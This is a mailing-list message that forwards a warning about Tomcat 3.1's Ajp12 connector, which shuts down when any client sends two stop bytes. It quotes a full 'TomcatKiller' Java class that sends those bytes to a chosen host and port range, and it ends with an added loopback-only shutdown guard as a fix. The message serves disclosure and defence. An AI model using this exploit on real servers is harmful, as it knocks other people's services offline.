Could you please post this also onto the Apache site?
Thank you - George

Stuart Maclean wrote:

> Hi all, just a word of warning about Tomcat 3.1 and from what I can
> tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> batch/shell file does its job by sending "exit please" bytes to
> Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> class below.  Just guess a host and port which may have Tomcat
> running, and over it goes...
>
> I patched the sources so hopefully it won't happen to me ;)
>
> import java.net.*;
> import java.io.*;
>
> public class TomcatKiller {
>
>         static public void main( String[] args ) {
>
>                 final byte SIGNAL = (byte)254;
>                 final byte BYEBYE = (byte)15;
>                 byte[] msg = { SIGNAL, BYEBYE };
>
>                 int min = 8007, max = 8007;
>                 String host = args[0];
>
>                 try {
>                         if( args.length > 1 )
>                                 min = max = Integer.parseInt( args[1] );
>                         if( args.length > 2 )
>                                 max = Integer.parseInt( args[2] );
>                         if( min > max ) {
>                                 int tmp = min;
>                                 min = max;
>                                 max = tmp;
>                         }
>                         for( int i = min; i <= max; i++ ) {
>                                 try {
>                                         Socket s = new Socket( host, i );
>                                         OutputStream os = s.getOutputStream();
>                                         os.write( msg );
>                                         os.flush();
>                                         break;
>                                 } catch( ConnectException ce ) {
>                                         System.err.println( "conn refused " + i );
>                                 } catch( IOException ioe ) {
>                                         ioe.printStackTrace();
>                                         break;
>                                 }
>                         }
>                 } catch( Exception e ) {
>                         e.printStackTrace();
>                         System.exit( 1 );
>                 }
>         }
> }
>
> // eof
>
> stu
>
> --
> Stuart Maclean, Research Associate
> University of Washington
> ITS Research Program, College of Engineering
> Box 352500
> Seattle, WA 98195-2500
> Tel: (206) 543-0637
> http://www.its.washington.edu
>
> ___________________________________________________________________________
> To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
> of the message "signoff SERVLET-INTEREST".
>
> Archives: http://archives.java.sun.com/archives/servlet-interest.html
> Resources: http://java.sun.com/products/servlet/external-resources.html
> LISTSERV Help: http://www.lsoft.com/manuals/user/user.html

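One way to close the hole described in the quoted message, as an added example that is not part of the original posts and is neither Tomcat's code nor Stuart's patch: bind the connector to the loopback interface and honour the two stop bytes only from a loopback peer. The class and method names are hypothetical; the byte values 254 and 15 come from the post.

```java
import java.io.*;
import java.net.*;

// Added example: hypothetical guard, not Tomcat's Ajp12 code.
public class Ajp12ShutdownGuard {
    static final int SIGNAL = 254, BYEBYE = 15; // byte values from the post above

    /** True when the first two bytes of a connection are the stop signal. */
    static boolean isShutdownSignal(int b0, int b1) {
        return b0 == SIGNAL && b1 == BYEBYE;
    }

    /** Policy: only a peer on the loopback interface may stop the server. */
    static boolean mayShutDown(InetAddress peer) {
        return peer.isLoopbackAddress();
    }

    /** Reads one connection's first two bytes; returns true if the server should stop. */
    static boolean handle(Socket s) throws IOException {
        s.setSoTimeout(2000); // do not let a silent client hold the acceptor
        InputStream in = s.getInputStream();
        int b0 = in.read(), b1 = in.read();
        if (!isShutdownSignal(b0, b1)) return false; // normal request path (omitted here)
        if (mayShutDown(s.getInetAddress())) return true;
        System.err.println("rejected stop signal from " + s.getRemoteSocketAddress());
        return false;
    }

    public static void main(String[] args) throws Exception {
        // Policy check on a constructed address (192.0.2.10 is a documentation address).
        System.out.println(mayShutDown(InetAddress.getByName("192.0.2.10"))); // remote peer
        // Bind to loopback so the port is not reachable from other hosts at all.
        try (ServerSocket ss = new ServerSocket(0, 50, InetAddress.getLoopbackAddress());
             Socket client = new Socket(ss.getInetAddress(), ss.getLocalPort())) {
            client.getOutputStream().write(new byte[] { (byte) SIGNAL, (byte) BYEBYE });
            try (Socket peer = ss.accept()) {
                System.out.println(handle(peer)); // local stop script
            }
        }
    }
}
```

A loopback check still lets any local user stop the server; a shared secret checked alongside the signal would narrow that further.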